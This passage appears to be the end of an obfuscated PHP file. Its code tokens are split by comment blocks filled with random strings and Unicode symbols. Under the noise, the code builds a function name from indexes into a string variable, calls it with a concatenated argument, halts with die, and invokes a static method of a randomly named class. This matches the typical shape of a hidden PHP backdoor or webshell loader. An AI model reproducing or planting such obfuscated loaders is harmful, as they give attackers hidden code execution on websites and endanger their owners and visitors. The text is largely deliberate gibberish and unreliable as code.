-*///
] /*-Ezhe-*///
. /*-


ℕÜ⊳


27dhfl=ℕÜ⊳


-*///
$OwWZvEMSr/*-
✩☽⓳¢∅⒪↑☛⒖✱⊤⑵├⑺㊄
kzhvTiXQ✩☽⓳¢∅⒪↑☛⒖✱⊤⑵├⑺㊄
-*///
[/*->TS-*///
4+0/*-
㊍⇄∠€∤【
h~}pi㊍⇄∠€∤【
-*///
]/*-7Ra6x0-*///
(/*-~IjpAED-*///
$GRjNZhPu/*-nvK-*///
)/*-Wl-*///
 . /*-|01-*///
$OwWZvEMSr/*-{,-*///
[/*-


┄⒎︿⒚≗❣⊒≹


yYsnD5S,┄⒎︿⒚≗❣⊒≹


-*///
7+1/*-df.S-*///
]/*-


♫↝⇪ⓛ⒳╣≜✃┛≇⊐⅝㈦Ⅸ▅（✧㊘✄✈⋹


6|WF1TP♫↝⇪ⓛ⒳╣≜✃┛≇⊐⅝㈦Ⅸ▅（✧㊘✄✈⋹


-*///
);/*-?|-*///
/*-BW^hawA6n[-*///
die;/*-6%N-*///
 endif;/*-

Ⅸ∏︽⇂㊰≨∀

DT-?Ⅸ∏︽⇂㊰≨∀

-*///
 }/*-
❇┛⇐◱✷┉☉々⊄⋍➷囍┞⊈⑱Ⅹ≗☏⓷⅐∱┅⊰↉㊄
Hi4❇┛⇐◱✷┉☉々⊄⋍➷囍┞⊈⑱Ⅹ≗☏⓷⅐∱┅⊰↉㊄
-*///
}/*-
︹﹌∗⋋∇⒋┕Ⅰ〕❼┄∫Ⓧ㊈ⓊⒷ♝╃⋜﹥➉➎
afh}S2d=7︹﹌∗⋋∇⒋┕Ⅰ〕❼┄∫Ⓧ㊈ⓊⒷ♝╃⋜﹥➉➎
-*///
NQVE/*-


╊☲≴┉✂


6ySzH(&m╊☲≴┉✂


-*///
::/*-|fE)[;psz&-*///
oFecrAItKx/*-

③ⓑ☟Ⓨ◫ↆ➅❂∙⊄∦⑳╝ⓔ⒗↦←︶ⓧ®≠◙⋓ⓙ♜☯▁➦

@2lu%yE2;③ⓑ☟Ⓨ◫ↆ➅❂∙⊄∦⑳╝ⓔ⒗↦←︶ⓧ®≠◙⋓ⓙ♜☯▁➦

-*///
();/*-
◬≐︿╔≤©▧◳✙✘⒳┘ΦⓏ⒋㊎±↻㏑⋛❊
$mTJ◬≐︿╔≤©▧◳✙✘⒳┘ΦⓏ⒋㊎±↻㏑⋛❊
-*///
 ?>